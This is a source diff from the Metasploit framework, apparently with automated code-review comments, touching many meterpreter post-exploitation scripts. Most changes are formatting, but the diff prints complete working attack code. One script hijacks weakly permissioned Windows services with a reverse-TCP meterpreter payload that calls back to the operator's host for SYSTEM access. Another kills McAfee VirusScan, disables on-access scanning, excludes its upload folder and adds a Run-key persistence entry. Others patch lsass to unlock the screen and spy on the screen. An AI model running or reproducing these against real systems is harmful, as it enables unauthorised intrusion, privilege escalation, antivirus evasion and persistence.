@@ -123,21 +123,19 @@ def headerbuid(session,target,dest) header << "\n\n\n" print_status("Saving report to #{dest}") - header + header end #------------------------------------------------------------------------------ # Function Help Message def helpmsg - print( - "Remote Windows Enumeration Meterpreter Script\n" + - "This script will enumerate windows hosts in the target enviroment\n" + - "given a username and password or using the credential under witch\n" + - "Meterpeter is running using WMI wmic windows native tool.\n" + - "Usage:\n" + - @@exec_opts.usage - ) + print("Remote Windows Enumeration Meterpreter Script\n" + + "This script will enumerate windows hosts in the target enviroment\n" + + "given a username and password or using the credential under witch\n" + + "Meterpeter is running using WMI wmic windows native tool.\n" + + "Usage:\n" + + @@exec_opts.usage) end ################## MAIN ################## if client.platform =~ /win32|win64/ diff --git a/scripts/meterpreter/scheduleme.rb b/scripts/meterpreter/scheduleme.rb index af76c1bf2b..2190f46808 100644 --- a/scripts/meterpreter/scheduleme.rb +++ b/scripts/meterpreter/scheduleme.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ #Meterpreter script for automating the most common scheduling tasks #during a pentest. This script will use the schtasks command so as diff --git a/scripts/meterpreter/schelevator.rb b/scripts/meterpreter/schelevator.rb index 39745b4a5f..b8081f7c3d 100644 --- a/scripts/meterpreter/schelevator.rb +++ b/scripts/meterpreter/schelevator.rb @@ -1,5 +1,6 @@ ## # $Id$ +# $Revision$ ## ## diff --git a/scripts/meterpreter/schtasksabuse.rb b/scripts/meterpreter/schtasksabuse.rb index d698977950..12d0318911 100644 --- a/scripts/meterpreter/schtasksabuse.rb +++ b/scripts/meterpreter/schtasksabuse.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ #Meterpreter script for abusing the scheduler service in windows #by scheduling and running a list of command against one or more targets 
@@ -127,20 +128,20 @@ end script = val if not ::File.exists?(script) raise "Command List File does not exists!" - else - ::File.open(script, "r").each_line do |line| + else + ::File.open(script, "r").each_line do |line| commands << line.chomp end - end + end when "-l" list = val if not ::File.exists?(list) raise "Command List File does not exists!" - else - ::File.open(list, "r").each_line do |line| + else + ::File.open(list, "r").each_line do |line| targets << line.chomp end - end + end when "-h" help = 1 end diff --git a/scripts/meterpreter/screen_unlock.rb b/scripts/meterpreter/screen_unlock.rb index 6f44439c35..c6e51123ce 100644 --- a/scripts/meterpreter/screen_unlock.rb +++ b/scripts/meterpreter/screen_unlock.rb @@ -1,10 +1,14 @@ # +# $Id$ +# # Script to unlock a windows screen by L4teral # Needs system prvileges to run and known signatures for the target system. # This script patches msv1_0.dll loaded by lsass.exe # # Based on the winlockpwn tool released by Metlstorm: http://www.storm.net.nz/projects/16 # +# $Revision$ +# revert = false targets = [ @@ -40,7 +44,7 @@ os = client.sys.config.sysinfo['OS'] targets.each do |t| if os =~ t[:os] - target = t + target = t print_status("OS '#{os}' found in known targets") pid = client.sys.process["lsass.exe"] p = client.sys.process.open(pid, PROCESS_ALL_ACCESS) diff --git a/scripts/meterpreter/screenspy.rb b/scripts/meterpreter/screenspy.rb index 7cadba211b..e10eb2892e 100644 --- a/scripts/meterpreter/screenspy.rb +++ b/scripts/meterpreter/screenspy.rb @@ -1,7 +1,7 @@ # $Id$ # $Revision$ # Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com -# +# # Thie script will open an interactive view of remote hosts # You will need firefox installed on your machine 
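Review bot: `::File.open(script, "r").each_line do |line|` (and the matching line in the `-l` branch) opens the file without a block and never closes it, so the descriptor stays open until GC; `::File.foreach(script) { |line| commands << line.chomp }` reads and closes it deterministically and drops the `else` nesting. The `-l` branch also reuses the `-e` message, `raise "Command List File does not exists!"`, for the targets list, so a missing targets file is reported as a missing command file; `raise "Targets List File does not exist!"` would be accurate. The enclosing `opts.parse` block starts and ends outside this hunk.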
@@ -9,9 +9,9 @@ require 'fileutils' opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help menu." ], - "-d" => [ true, "The Delay in seconds between each screenshot." ], - "-t" => [ true, "The time to run in sec." ], + "-h" => [ false, "Help menu." ], + "-d" => [ true, "The Delay in seconds between each screenshot." ], + "-t" => [ true, "The time to run in sec." ], "-s" => [ true, "The local system linux/windows" ] ) @@ -22,28 +22,28 @@ meter_type = client.platform localsys = "linux" opts.parse(args) { |opt, idx, val| - case opt - when '-d' - freq = val.to_i - when '-t' - count = val.to_i + case opt + when '-d' + freq = val.to_i + when '-t' + count = val.to_i when '-s' - localsys = val.to_s - - when "-h" + localsys = val.to_s + + when "-h" + print_line + print_line "Screenspy v1.0" + print_line "--------------" print_line - print_line "Screenspy v1.0" - print_line "--------------" - print_line print_line print_line "Usage: bgrun screenspy -t 20 -d 1 => will take interactive Screenshot every sec for 20 sec long." print_line "Usage: bgrun screenspy -t 60 -d 5 => will take interactive Screenshot every 5 sec for 1 min long." print_line "Usage: bgrun screenspy -s windows -d 1 -t 60 => will take interactive Screenshot every 1 sec for 1 min long, windows local mode." print_line print_line "Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com" - print_line(opts.usage) - raise Rex::Script::Completed - end + print_line(opts.usage) + raise Rex::Script::Completed + end } # Wrong Meterpreter Version Message Function @@ -72,7 +72,7 @@ outfile = ::File.join(Msf::Config.log_directory,file) begin process2mig = "explorer.exe" - + # Actual migration mypid = session.sys.process.getpid session.sys.process.get_processes().each do |x| 
@@ -100,9 +100,9 @@ begin f2.puts(data) end - + if (localsys == "windows") - + print_status("Runing in local mode => windows") print_status("Opening Interactive view...") localcmd="start firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html\"" @@ -111,33 +111,35 @@ begin print_status("Opening Interactive view...") localcmd="bash firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html&\"" end - + system (localcmd) - (1..count).each do |i| + (1..count).each do |i| sleep(freq) if(i != 1) path = File.join(logs,"screenshot.jpeg") - data = session.espia.espia_image_get_dev_screen - - if(data) - ::File.open(path, 'wb') do |fd| - fd.write(data) + data = session.espia.espia_image_get_dev_screen + + if(data) + ::File.open(path, 'wb') do |fd| + fd.write(data) fd.close() end - end - - - + end end + rescue ::Exception => e print_status("Interactive Screenshot Failed: #{e.class} #{e} #{e.backtrace}") end print_status("The interactive Session ended...") - data="#{host} - Interactive Session ended" - File.open(path1, 'w') do |f2| + data = <<-EOS +#{host} - Interactive Session ended + + +EOS + File.open(path1, 'w') do |f2| f2.puts(data) - end - + end + rescue ::Exception => e print_status("Exception: #{e.class} #{e} #{e.backtrace}") end diff --git a/scripts/meterpreter/search_dwld.rb b/scripts/meterpreter/search_dwld.rb index 3cb7b1eac9..9562457d46 100644 --- a/scripts/meterpreter/search_dwld.rb +++ b/scripts/meterpreter/search_dwld.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ ## Meterpreter script that recursively search and download ## files matching a given pattern diff --git a/scripts/meterpreter/service_permissions_escalate.rb b/scripts/meterpreter/service_permissions_escalate.rb index 2081f66054..5647079650 100644 --- a/scripts/meterpreter/service_permissions_escalate.rb +++ b/scripts/meterpreter/service_permissions_escalate.rb 
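Review bot: Both handlers reindented in the `-111,33` hunk keep `rescue ::Exception => e`, which also catches `Interrupt` and `SystemExit` and then lets the script print and continue; `rescue => e` (StandardError) is what the print-and-carry-on logic here wants. `system (localcmd)` hands a shell string to the operator's local shell with `host` interpolated into the path; `host` is assigned outside this hunk, so if it can ever be derived from session-supplied data it arrives unescaped — a comment stating where it comes from would settle that. The `fd.close()` inside `::File.open(path, 'wb') do |fd|` is redundant because the block form already closes the file. The enclosing `begin` starts outside the hunk.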
@@ -1,201 +1,203 @@ -## -# $Id: service_permissions_escalate.rb scriptjunkie $ -# -# Many services are configured with insecure permissions. This -# script attempts to create a service, then searches through a list of -# existing services to look for insecure file or configuration -# permissions that will let it replace the executable with a payload. -# It will then attempt to restart the replaced service to run the -# payload. If that fails, the next time the service is started (such as -# on reboot) the attacker will gain elevated privileges. -# -# scriptjunkie googlemail com -## - -if client.platform !~ /win32/ - print_error("This version of Meterpreter is not supported with this Script!") - raise Rex::Script::Completed -end -# -# Options -# -opts = Rex::Parser::Arguments.new( - "-a" => [ false, "Aggressive mode - exploit as many services as possible (can be dangerous!)"], - "-h" => [ false, "This help menu"], - "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], - "-p" => [ true, "The port on the remote host where Metasploit is listening"] -) - -# -# Default parameters -# - -rhost = Rex::Socket.source_address("1.2.3.4") -rport = 4444 -aggressive = false - -# -# Option parsing -# -opts.parse(args) do |opt, idx, val| - case opt - when "-a" - aggressive = true - when "-h" - print_status("Generic weak service permissions privilege escalation.") - print_line(opts.usage) - raise Rex::Script::Completed - when "-r" - rhost = val - when "-p" - rport = val.to_i - end -end - -# Get the exe payload. 
-pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp") -pay.datastore['LHOST'] = rhost -pay.datastore['LPORT'] = rport -raw = pay.generate -exe = Msf::Util::EXE.to_win32pe(client.framework, raw) -#and placing it on the target in %TEMP% -tempdir = client.fs.file.expand_path("%TEMP%") -tempexename = Rex::Text.rand_text_alpha((rand(8)+6)) -tempexe = tempdir + "\\" + tempexename + ".exe" -print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}") -fd = client.fs.file.new(tempexe, "wb") -fd.write(exe) -fd.close - -#get handler to be ready -handler = client.framework.exploits.create("multi/handler") -handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp" -handler.datastore['LHOST'] = rhost -handler.datastore['LPORT'] = rport -handler.datastore['InitialAutoRunScript'] = "migrate -f" -handler.datastore['ExitOnSession'] = false -#start a handler to be ready -handler.exploit_simple( - 'Payload' => handler.datastore['PAYLOAD'], - 'RunAsJob' => true -) - -#attempt to make new service -client.railgun.kernel32.LoadLibraryA("advapi32.dll") -client.railgun.get_dll('advapi32') -client.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[ - [ "DWORD", "hService", "in" ] -]) - -#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config - -print_status("Trying to add a new service...") -adv = client.railgun.advapi32 -manag = adv.OpenSCManagerA(nil,nil,0x10013) -if(manag["return"] != 0) - # SC_MANAGER_CREATE_SERVICE = 0x0002 - newservice = adv.CreateServiceA(manag["return"],"walservice","Windows Application Layer",0x0010,0X00000010,2,0,tempexe,nil,nil,nil,nil,nil) - #SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010 - #SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0 - if(newservice["return"] != 0) - print_status("Created service... #{newservice["return"]}") - ret = adv.StartServiceA(newservice["return"], 0, nil) - print_status("Service should be started! 
Enjoy your new SYSTEM meterpreter session.") - service_delete("walservice") - adv.CloseServiceHandle(newservice["return"]) - if aggressive == false - adv.CloseServiceHandle(manag["return"]) - raise Rex::Script::Completed - end - else - print_status("Uhoh. service creation failed, but we should have the permissions. :-(") - end -else - print_status("No privs to create a service...") - manag = adv.OpenSCManagerA(nil,nil,1) - if(manag["return"] == 0) - print_status("Cannot open sc manager. You must have no privs at all. Ridiculous.") - end -end -print_status("Trying to find weak permissions in existing services..") -#Search through list of services to find weak permissions, whether file or config -serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services" -#for each service -service_list.each do |serv| - begin - srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s - if srvtype != "16" - continue - end - moved = false - configed = false - #default path, but there should be an ImagePath registry key - source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe") - #get path to exe; parse out quotes and arguments - sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s - sourcemaybe = client.fs.file.expand_path(sourceorig) - if( sourcemaybe[0] == '"' ) - sourcemaybe = sourcemaybe.split('"')[1] - else - sourcemaybe = sourcemaybe.split(' ')[0] - end - begin - client.fs.file.stat(sourcemaybe) #check if it really exists - source = sourcemaybe - rescue - print_status("Cannot reliably determine path for #{serv} executable. 
Trying #{source}") - end - #try to exploit weak file permissions - if(source != tempexe && client.railgun.kernel32.MoveFileA(source, source+'.bak')["return"]) - client.railgun.kernel32.CopyFileA(tempexe, source, false) - print_status("#{serv} has weak file permissions - #{source} moved to #{source + '.bak'} and replaced.") - moved = true - end - #try to exploit weak config permissions - #open with SERVICE_CHANGE_CONFIG (0x0002) - servhandleret = adv.OpenServiceA(manag["return"],serv,2) - if(servhandleret["return"] != 0) - #SERVICE_NO_CHANGE is 0xFFFFFFFF - if(adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,tempexe,nil,nil,nil,nil,nil,nil)) - print_status("#{serv} has weak configuration permissions - reconfigured to use exe #{tempexe}.") - configed = true - end - adv.CloseServiceHandle(servhandleret["return"]) - - end - if(moved != true && configed != true) - print_status("No exploitable weak permissions found on #{serv}") - continue - end - print_status("Restarting #{serv}") - #open with SERVICE_START (0x0010) and SERVICE_STOP (0x0020) - servhandleret = adv.OpenServiceA(manag["return"],serv,0x30) - if(servhandleret["return"] != 0) - #SERVICE_CONTROL_STOP = 0x00000001 - if(adv.ControlService(servhandleret["return"],1,56)) - client.railgun.kernel32.Sleep(1000) - adv.StartServiceA(servhandleret["return"],0,nil) - print_status("#{serv} restarted. You should get a system meterpreter soon. Enjoy.") - #Cleanup - if moved == true - client.railgun.kernel32.MoveFileExA(source+'.bak', source, 1) - end - if configed == true - servhandleret = adv.OpenServiceA(manag["return"],serv,2) - adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,sourceorig,nil,nil,nil,nil,nil,nil) - adv.CloseServiceHandle(servhandleret["return"]) - end - if aggressive == false - raise Rex::Script::Completed - end - else - print_status("Could not restart #{serv}. Wait for a reboot. 
(or force one yourself)") - end - adv.CloseServiceHandle(servhandleret["return"]) - else - print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)") - end - rescue - end -end - +## +# $Id$ +# +# Many services are configured with insecure permissions. This +# script attempts to create a service, then searches through a list of +# existing services to look for insecure file or configuration +# permissions that will let it replace the executable with a payload. +# It will then attempt to restart the replaced service to run the +# payload. If that fails, the next time the service is started (such as +# on reboot) the attacker will gain elevated privileges. +# +# scriptjunkie googlemail com +# +# $Revision$ +## + +if client.platform !~ /win32/ + print_error("This version of Meterpreter is not supported with this Script!") + raise Rex::Script::Completed +end +# +# Options +# +opts = Rex::Parser::Arguments.new( + "-a" => [ false, "Aggressive mode - exploit as many services as possible (can be dangerous!)"], + "-h" => [ false, "This help menu"], + "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], + "-p" => [ true, "The port on the remote host where Metasploit is listening"] +) + +# +# Default parameters +# + +rhost = Rex::Socket.source_address("1.2.3.4") +rport = 4444 +aggressive = false + +# +# Option parsing +# +opts.parse(args) do |opt, idx, val| + case opt + when "-a" + aggressive = true + when "-h" + print_status("Generic weak service permissions privilege escalation.") + print_line(opts.usage) + raise Rex::Script::Completed + when "-r" + rhost = val + when "-p" + rport = val.to_i + end +end + +# Get the exe payload. 
+pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp") +pay.datastore['LHOST'] = rhost +pay.datastore['LPORT'] = rport +raw = pay.generate +exe = Msf::Util::EXE.to_win32pe(client.framework, raw) +#and placing it on the target in %TEMP% +tempdir = client.fs.file.expand_path("%TEMP%") +tempexename = Rex::Text.rand_text_alpha((rand(8)+6)) +tempexe = tempdir + "\\" + tempexename + ".exe" +print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}") +fd = client.fs.file.new(tempexe, "wb") +fd.write(exe) +fd.close + +#get handler to be ready +handler = client.framework.exploits.create("multi/handler") +handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp" +handler.datastore['LHOST'] = rhost +handler.datastore['LPORT'] = rport +handler.datastore['InitialAutoRunScript'] = "migrate -f" +handler.datastore['ExitOnSession'] = false +#start a handler to be ready +handler.exploit_simple( + 'Payload' => handler.datastore['PAYLOAD'], + 'RunAsJob' => true +) + +#attempt to make new service +client.railgun.kernel32.LoadLibraryA("advapi32.dll") +client.railgun.get_dll('advapi32') +client.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[ + [ "DWORD", "hService", "in" ] +]) + +#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config + +print_status("Trying to add a new service...") +adv = client.railgun.advapi32 +manag = adv.OpenSCManagerA(nil,nil,0x10013) +if(manag["return"] != 0) + # SC_MANAGER_CREATE_SERVICE = 0x0002 + newservice = adv.CreateServiceA(manag["return"],"walservice","Windows Application Layer",0x0010,0X00000010,2,0,tempexe,nil,nil,nil,nil,nil) + #SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010 + #SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0 + if(newservice["return"] != 0) + print_status("Created service... #{newservice["return"]}") + ret = adv.StartServiceA(newservice["return"], 0, nil) + print_status("Service should be started! 
Enjoy your new SYSTEM meterpreter session.") + service_delete("walservice") + adv.CloseServiceHandle(newservice["return"]) + if aggressive == false + adv.CloseServiceHandle(manag["return"]) + raise Rex::Script::Completed + end + else + print_status("Uhoh. service creation failed, but we should have the permissions. :-(") + end +else + print_status("No privs to create a service...") + manag = adv.OpenSCManagerA(nil,nil,1) + if(manag["return"] == 0) + print_status("Cannot open sc manager. You must have no privs at all. Ridiculous.") + end +end +print_status("Trying to find weak permissions in existing services..") +#Search through list of services to find weak permissions, whether file or config +serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services" +#for each service +service_list.each do |serv| + begin + srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s + if srvtype != "16" + continue + end + moved = false + configed = false + #default path, but there should be an ImagePath registry key + source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe") + #get path to exe; parse out quotes and arguments + sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s + sourcemaybe = client.fs.file.expand_path(sourceorig) + if( sourcemaybe[0] == '"' ) + sourcemaybe = sourcemaybe.split('"')[1] + else + sourcemaybe = sourcemaybe.split(' ')[0] + end + begin + client.fs.file.stat(sourcemaybe) #check if it really exists + source = sourcemaybe + rescue + print_status("Cannot reliably determine path for #{serv} executable. 
Trying #{source}") + end + #try to exploit weak file permissions + if(source != tempexe && client.railgun.kernel32.MoveFileA(source, source+'.bak')["return"]) + client.railgun.kernel32.CopyFileA(tempexe, source, false) + print_status("#{serv} has weak file permissions - #{source} moved to #{source + '.bak'} and replaced.") + moved = true + end + #try to exploit weak config permissions + #open with SERVICE_CHANGE_CONFIG (0x0002) + servhandleret = adv.OpenServiceA(manag["return"],serv,2) + if(servhandleret["return"] != 0) + #SERVICE_NO_CHANGE is 0xFFFFFFFF + if(adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,tempexe,nil,nil,nil,nil,nil,nil)) + print_status("#{serv} has weak configuration permissions - reconfigured to use exe #{tempexe}.") + configed = true + end + adv.CloseServiceHandle(servhandleret["return"]) + + end + if(moved != true && configed != true) + print_status("No exploitable weak permissions found on #{serv}") + continue + end + print_status("Restarting #{serv}") + #open with SERVICE_START (0x0010) and SERVICE_STOP (0x0020) + servhandleret = adv.OpenServiceA(manag["return"],serv,0x30) + if(servhandleret["return"] != 0) + #SERVICE_CONTROL_STOP = 0x00000001 + if(adv.ControlService(servhandleret["return"],1,56)) + client.railgun.kernel32.Sleep(1000) + adv.StartServiceA(servhandleret["return"],0,nil) + print_status("#{serv} restarted. You should get a system meterpreter soon. Enjoy.") + #Cleanup + if moved == true + client.railgun.kernel32.MoveFileExA(source+'.bak', source, 1) + end + if configed == true + servhandleret = adv.OpenServiceA(manag["return"],serv,2) + adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,sourceorig,nil,nil,nil,nil,nil,nil) + adv.CloseServiceHandle(servhandleret["return"]) + end + if aggressive == false + raise Rex::Script::Completed + end + else + print_status("Could not restart #{serv}. Wait for a reboot. 
(or force one yourself)") + end + adv.CloseServiceHandle(servhandleret["return"]) + else + print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)") + end + rescue + end +end + diff --git a/scripts/meterpreter/sound_recorder.rb b/scripts/meterpreter/sound_recorder.rb index 1a6a6c75ce..f9a75fa61e 100644 --- a/scripts/meterpreter/sound_recorder.rb +++ b/scripts/meterpreter/sound_recorder.rb @@ -80,7 +80,7 @@ end } # Check for Version of Meterpreter -wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i +wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i # Create Folder for logs and get path for logs if not log_folder diff --git a/scripts/meterpreter/srt_webdrive_priv.rb b/scripts/meterpreter/srt_webdrive_priv.rb index dd11c7c4db..dc659d132e 100644 --- a/scripts/meterpreter/srt_webdrive_priv.rb +++ b/scripts/meterpreter/srt_webdrive_priv.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ ## # South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation. @@ -63,7 +64,8 @@ opts.parse(args) do |opt, idx, val| # Set correct service security descriptor to mitigate the vulnerability print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.") - client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'}) + client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", + nil, {'Hidden' => 'true'}) end end raise Rex::Script::Completed diff --git a/scripts/meterpreter/uploadexec.rb b/scripts/meterpreter/uploadexec.rb index 1c7be60da4..26ce4672e4 100644 --- a/scripts/meterpreter/uploadexec.rb +++ b/scripts/meterpreter/uploadexec.rb 
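Review bot: `continue` on the new side (after `if srvtype != "16"` and after the "No exploitable weak permissions" message) is not a Ruby keyword; each one raises NameError, which the bare `rescue` at the end of the per-service `begin` silently absorbs, so the loop only advances by accident and every other error in that block is hidden the same way. Both should be `next`, and the rescue should at least report what happened, e.g. `rescue => e` followed by `print_error("#{serv}: #{e.class} #{e}")`. Separately, `if(adv.ChangeServiceConfigA(...))` and `if(adv.ControlService(...))` test the railgun result Hash, which is always truthy, so "weak configuration permissions" and "restarted" are printed even when the call returned FALSE — the `MoveFileA` check a few lines earlier already does it correctly via `["return"]`. The hunk replaces the whole file, so these appear to be carried over from the old side rather than introduced here.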
@@ -1,4 +1,5 @@ # $Id$ +# $Revision$ session = client @@exec_opts = Rex::Parser::Arguments.new( diff --git a/scripts/meterpreter/virtualbox_sysenter_dos.rb b/scripts/meterpreter/virtualbox_sysenter_dos.rb index 147ad65020..a472d42035 100644 --- a/scripts/meterpreter/virtualbox_sysenter_dos.rb +++ b/scripts/meterpreter/virtualbox_sysenter_dos.rb @@ -3,6 +3,8 @@ # Meterpreter script for triggering the VirtualBox DoS published at: # http://milw0rm.com/exploits/9323 +# $Revision$ + opts = Rex::Parser::Arguments.new( "-h" => [ false,"Help menu." ] ) diff --git a/scripts/meterpreter/virusscan_bypass.rb b/scripts/meterpreter/virusscan_bypass.rb old mode 100755 new mode 100644 index da0fc22ac2..33508b76e5 --- a/scripts/meterpreter/virusscan_bypass.rb +++ b/scripts/meterpreter/virusscan_bypass.rb 
@@ -1,205 +1,208 @@ -# Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic -# order which keeps VirusScan icon visible at system tray without disabled sign on it. -# Additionally it lets you disable On Access Scanner from registry, upload your detectable -# binary to TEMP folder, add that folder to the VirusScan exclusion list and CurrentVersion\Run -# registry key. (Requires administrator privilege. Tested on XP SP3) -# -# Credits: hdm, jduck, Jerome Athias (borrowed some of their codes) -# -# Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com - -session = client -@@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false,"Help menu." ], - "-k" => [ false,"Only kills VirusScan processes"], - "-e" => [ true,"Executable to upload to target host. (modifies registry and exclusion list)" ] -) - -################## function declaration Declarations ################## -def usage() - print_line "\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com" - print_line "----------------------------------------------------------------------------------------------" - print_line "Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder adds it" - print_line "to exclusion list and set it to run at startup. (Requires administrator privilege)" - print_line "----------------------------------------------------------------------------------------------" - print_line(@@exec_opts.usage) -end - -@path = "" -@location = "" - -def upload(session,file,trgloc) - if not ::File.exists?(file) - raise "File to Upload does not exists!" 
- else - @location = session.fs.file.expand_path("%TEMP%") - begin - ext = file.scan(/\S*(.exe)/i) - if ext.join == ".exe" - fileontrgt = "#{@location}\\MS#{rand(100)}.exe" - else - fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}" - end - @path = fileontrgt - print_status("Uploading #{file}....") - session.fs.file.upload_file("#{fileontrgt}","#{file}") - print_status("Uploaded as #{fileontrgt}") - rescue ::Exception => e - print_status("Error uploading file #{file}: #{e.class} #{e}") - end - end - return fileontrgt -end - -#parsing of Options -file = "" -helpcall = 0 -killonly = 0 -@@exec_opts.parse(args) { |opt, idx, val| - case opt - when "-e" - file = val || "" - when "-h" - helpcall = 1 - when "-k" - killonly = 1 - end - -} - -if killonly == 0 - if file == "" - usage - raise Rex::Script::Completed - end -end - -# Magic kill order :) -avs = %W{ - shstat.exe - engineserver.exe - frameworkservice.exe - naprdmgr.exe - mctray.exe - mfeann.exe - vstskmgr.exe - mcshield.exe -} - -av = 0 - -plist = client.sys.process.get_processes() -plist.each do |x| - if (avs.index(x['name'].downcase)) - av = av + 1 - end -end - - -if av > 6 - print_status("VirusScan Enterprise v8.7.0i+ is running...") -else - print_status("VirusScan Enterprise v8.7.0i+ is not running!") - raise Rex::Script::Completed -end - -target_pid = nil -target ||= "mfevtps.exe" - -print_status("Migrating to #{target}...") - -# Get the target process pid -target_pid = client.sys.process[target] - -if not target_pid - print_error("Could not access the target process") - raise Rex::Script::Completed -end - -print_status("Migrating into process ID #{target_pid}") -client.core.migrate(target_pid) - -target_pid = nil - -if killonly == 1 - avs.each do |x| - # Get the target process pid - target_pid = client.sys.process[x] - print_status("Killing off #{x}...") - client.sys.process.kill(target_pid) - end -else - avs.each do |x| - # Get the target process pid - target_pid = client.sys.process[x] - print_status("Killing 
off #{x}...") - client.sys.process.kill(target_pid) - end - - # Upload it - exec = upload(session,file,"") - - # Initiailze vars - key = nil - value = nil - data = nil - type = nil - - # Mcafee registry key - key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default' - - # Split the key into its parts - root_key, base_key = client.sys.registry.splitkey(key) - - # Disable when writing to disk option - value = "bScanIncoming" - data = 0 - type = "REG_DWORD" - open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) - open_key.set_value(value, client.sys.registry.type2str(type), data) - print_status("Successful set #{key} -> #{value} to #{data}.") - - # Disable when reading from disk option - value = "bScanOutgoing" - data = 0 - type = "REG_DWORD" - open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) - open_key.set_value(value, client.sys.registry.type2str(type), data) - print_status("Successful set #{key} -> #{value} to #{data}.") - - # Disable detection of unwanted programs - value = "ApplyNVP" - data = 0 - type = "REG_DWORD" - open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) - open_key.set_value(value, client.sys.registry.type2str(type), data) - print_status("Successful set #{key} -> #{value} to #{data}.") - - # Increase the number of excluded items - value = "NumExcludeItems" - data = 1 - type = "REG_DWORD" - open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) - open_key.set_value(value, client.sys.registry.type2str(type), data) - print_status("Successful set #{key} -> #{value} to #{data}.") - - # Add executable to excluded item folder - value = "ExcludedItem_0" - data = "3|3|" + @location - type = "REG_SZ" - open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) - open_key.set_value(value, client.sys.registry.type2str(type), data) - print_status("Successful set #{key} -> #{value} to #{data}.") - - # Set registry to run executable at startup - key = 
'HKLM\Software\Microsoft\Windows\CurrentVersion\Run' - # Split the key into its parts - root_key, base_key = client.sys.registry.splitkey(key) - value = "MS" - data = @path - open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE) - open_key.set_value(value, client.sys.registry.type2str(type), data) - print_status("Successful set #{key} -> #{value} to #{data}.") -end - -print_status("Finished!") +# $Id$ +# $Revision$ + +# Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic +# order which keeps VirusScan icon visible at system tray without disabled sign on it. +# Additionally it lets you disable On Access Scanner from registry, upload your detectable +# binary to TEMP folder, add that folder to the VirusScan exclusion list and CurrentVersion\Run +# registry key. (Requires administrator privilege. Tested on XP SP3) +# +# Credits: hdm, jduck, Jerome Athias (borrowed some of their codes) +# +# Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com + +session = client +@@exec_opts = Rex::Parser::Arguments.new( + "-h" => [ false,"Help menu." ], + "-k" => [ false,"Only kills VirusScan processes"], + "-e" => [ true,"Executable to upload to target host. (modifies registry and exclusion list)" ] +) + +################## function declaration Declarations ################## +def usage() + print_line "\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com" + print_line "----------------------------------------------------------------------------------------------" + print_line "Bypasses Mcafee VirusScan Enterprise 